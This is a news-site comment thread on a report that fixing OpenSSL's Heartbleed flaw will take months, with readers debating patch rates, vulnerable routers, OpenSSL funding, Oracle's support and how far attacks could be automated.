Feeds

back to article Fixing OpenSSL's Heartbleed flaw will take MONTHS, warns Secunia

Expunging the Heartbleed bug from vulnerable computers and gadgets is likely to take months, according to a leading vuln research firm. The cautionary assessment by Secunia comes as more and more products are judged to be vulnerable to the infamous OpenSSL security flaw. Heartbleed most obviously affected secure web servers but …

COMMENTS

This topic is closed for new posts.

I notice you're letting Apple off the hook for this one.

1
1
Silver badge
Coat

For the moment

The media is just waiting for a declaration from Steve Jobs before deciding to go with leniency or overzealous outrage.

2
0
Anonymous Coward

It will never be eradicated. So many routers etc are deployed (with web-front ends for management) that user's can't update and ISPs can't be arsed to update. Then various embedded systems.

Perhaps these companies basing the multi-billion dollar products should band together and pay the OpenSSL team more than the derisory combined total of US$2k pa they have been.

4
1
Bronze badge

scaremongering

Although serious, this particular bug was only in the OpenSSL repository for a little over a year. So for appliances, such as managed routers only those designed in that time will be vulnerable. And how many of them will have port 443 open to the world. If vulnerable routers have been distributed by e.g. ISPs, they should know their customers, and be able to issue upgrade notices.

Few heavyweight servers will be affected as they tend to use long-term stable versions of crucial software. Machines that are kept at cutting edge or actively managed will have received security patches within a day or two of the disclosure/announcement.

There may be problems with some Android based phones if the vendors choose not to push updates.

We need some perspective here.

4
0
Silver badge

"Machines that are kept at cutting edge or actively managed will have received security patches within a day or two of the disclosure/announcement."

Really ? I'm sure that actively managed machines will have been patched quicker than others, but I'm also pretty much convinced that patching schedules tend to not be on the top of the urgency pile most of the time - until the waste product encours the rotating propulsion system, that is.

Now that it has happened, all high-profile web sites are on the ball, no doubt, but I'm certain that we'll be hearing about this bug for as long as we've heard about unsalted (or non-existant) hashes for passwords.

0
0
Silver badge

Odd how Oracle releases products that use both NSS and OpenSSL, supports NSS yet doesn't support OpenSSL.

Nice to see Oracle putting patches out quickly, but supporting OpenSSL would have costed Larry less in the first place. To put it in language he understands, it probably wouldn't have costed more than a metre of yacht.

1
0
Holmes

http://opensslrampage.org/

http://www.libressl.org/

0
0
Silver badge

Solutionism

Bitcoin and co. are examples of "solutionism": where technological solutions to non-technological problems are posed. Unsurprisingly, this is really popular with the tech invest lobby. Equally unsurprisingly, the solutions rarely solve the problems they are supposed to.

1
0
Bronze badge

Re: Solutionism

Unsurprisingly, this is really popular with the tech invest lobby get rich quick crowd.

FTFY!

0
0

Secunia only rates the vulnerability as 9 out of 10 because the bug does not give rise to a remote code execution vulnerability.

So because it's a two step process - steal the admin's login credentials first - it's only moderately critical? Good to know.

0
0

Perhaps the two-step nature of the process means it can't be fully automated?

0
0
Bronze badge

Perhaps the two-step nature of the process means it can't be fully automated?

I believe there are plenty of Heartbleed-based exploits that can be fully automated.

I've already pointed out in other Reg forums that identifying the server's private key can be fully automated. Once you have that, you could mount an active MITM attack (using e.g. DNS poisoning or phishing), or decrypt traffic you passively record, if you're in a position to do that. I don't see any reason why those can't be automated as well.

0
0
This topic is closed for new posts.